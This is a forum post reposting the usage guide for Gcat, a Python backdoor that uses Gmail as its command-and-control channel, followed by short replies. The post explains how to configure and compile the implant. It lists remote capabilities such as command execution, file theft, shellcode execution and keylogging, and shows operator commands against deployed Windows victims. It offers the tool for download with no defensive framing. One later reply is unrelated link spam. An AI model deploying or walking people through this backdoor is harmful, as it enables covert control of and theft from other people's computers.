Gcat: uses Gmail as a command and control server

Post Reply
User avatar
hackinformer
Site Admin
Posts: 708
Joined: Sun Feb 16, 2014 3:30 pm

Gcat: uses Gmail as a command and control server

Post by hackinformer » Wed Sep 09, 2015 6:12 pm

Gcat is a stealthy Python based backdoor that uses Gmail as a command and control server by byt3bl33d3r

Setup
For this to work you need:

A Gmail account (Use a dedicated account! Do not use your personal one!)
Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:

gcat.py a script that's used to enumerate and issue commands to available clients
implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.

You're probably going to want to compile implant.py into an executable using Pyinstaller

Usage
Gcat

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve

-list List available clients
-info Retrieve info on specified client

Commands:
Commands to execute on an implant

-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger
Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on

Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command

Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

Download

source
Edward9202
Junior Member
Posts: 2
Joined: Sun Oct 02, 2022 8:14 am

Re: Gcat: uses Gmail as a command and control server

Post by Edward9202 » Sun Oct 02, 2022 8:21 am

Gmail is one of the most common platforms which is used as a command and control server on windows. For this purpose, the python-based backdoor is used and this link will definitely prove helpful for using Gmail as a control server.
MichaelLandis
Junior Member
Posts: 19
Joined: Fri Dec 23, 2022 10:09 pm

Re: Gcat: uses Gmail as a command and control server

Post by MichaelLandis » Sun Dec 17, 2023 8:21 pm

Useful topic.
Edward9202
Junior Member
Posts: 2
Joined: Sun Oct 02, 2022 8:14 am

Re: Gcat: uses Gmail as a command and control server

Post by Edward9202 » Tue Mar 05, 2024 7:01 pm

E-commerce, or electronic commerce, refers to the buying and selling of goods and services over the internet. The importance of e-commerce businesses has grown significantly in recent years, and several factors contribute to their prominence in the modern economy
https://www.joindota.com/users/2238174-mycardstatement
https://www.rctech.net/forum/members/my ... 50166.html
Post Reply